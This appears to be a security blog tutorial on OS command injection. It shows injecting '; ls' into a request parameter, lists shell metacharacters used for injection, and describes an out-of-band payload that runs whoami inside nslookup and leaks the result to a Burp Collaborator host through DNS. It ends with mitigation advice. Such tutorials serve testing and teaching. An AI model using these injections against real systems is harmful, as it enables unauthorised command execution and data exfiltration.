Exploiting Command Injection

Image for post
Image for post

With a real-world example:

Command Injection is an injection vulnerability where attackers can execute system commands bypassing input through the input fields of the application. This vulnerability occurs because the application is passing unsanitized and unsafe inputs to the system commands.

The application allows users to run some of the specific commands online such as ping and traceroute. But since the application is not sanitized or validating the inputs before passing this to the system command. An attacker can elevate his/her privilege by inserting malicious code in the application and can perform unwanted actions.

Example: Application is transferring the value of the ID parameter directly to the system command.

Image for post
Image for post

Now the attacker tampers the value of the id parameter and gives; ls instead of the numeric value.

Note: We can execute any system command such as PWD, whoami, etc.

Image for post
Image for post

In response, we can see execute command output. I used; meta char. There are other meta char also available with which we can perform command injection such as ; , & , && , | , || , ` , () , # .

It is not language-dependent and can be found in any environment where the application is unsafely transferring the user input directly in the system command.


Now attacker checks in an application where command execution functionality exists then he adds additional commands with the help of meta char to check the response of his additional commands.

Image for post
Image for post

· After finding the input field where an attacker can inject system command

· The modified system command interacts with the backend OS. As our input is not sanitized meta chars directly interact with the backend and can run his own commands on the server.

· As individual command got executed on the server, the attacker can see the respective command output on UI.


The application has a feedback form by which users can submit the feedback form. The value of the feedback form is not getting sanitized in any way.

If we intercept the request of the feedback form we can see this type of request.

Image for post
Image for post

Our specific requirement is to fetch the name of the currently logged-in user to the application. In Linux, it can easily be done by using whoami command.

In order to see the response, we have to send it to a server which is logging all the requests.

So to fulfill the above requirement I will enter the below payload in fields and will check the response in burp collaborator client.


nn = For text writing in textbox it can be anything

Nslookup = for name server lookup

Whoami = command in Linux, which provides me who is currently signed in and I give this in ` meta char.

2ru5ecuswz35etelianpdx17uy0poe.burpcollaborator. net = Burp collaborator address

+ = used to remove space

. = this is used to append the output of the command with the Burp collaborator client URL so we can have this log in the collaborator client.

We also have to check in each and every field of the feedback form in order to check which parameter is vulnerable to command injection.

As I provided the payload in the name field:

Image for post
Image for post

It gave me 400 error in response, as the length of the name cannot be more than 64, now I provide this payload in the email field.

Image for post
Image for post

In response, I got 200 OK, it seems the request has been successfully let's try whether we have any responsibility in our burp collaborator client.

Image for post
Image for post

Here you can see that we have received some DNS requests as we used nslookup so these are the DNS requests. In the description, you can see that the value of the currently logged-in user is appended to it.


· Sanitization of input, which is going to pass in system commands.

· Whitelisting of input commands which are needed as per business requirements.

· Run server’s on limited permissions and do proper authorization on servers.

· Perform source code reviews for system calls.

Written by

Security enthusiast working to secure web for others https://twitter.com/BoredSecEngg

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store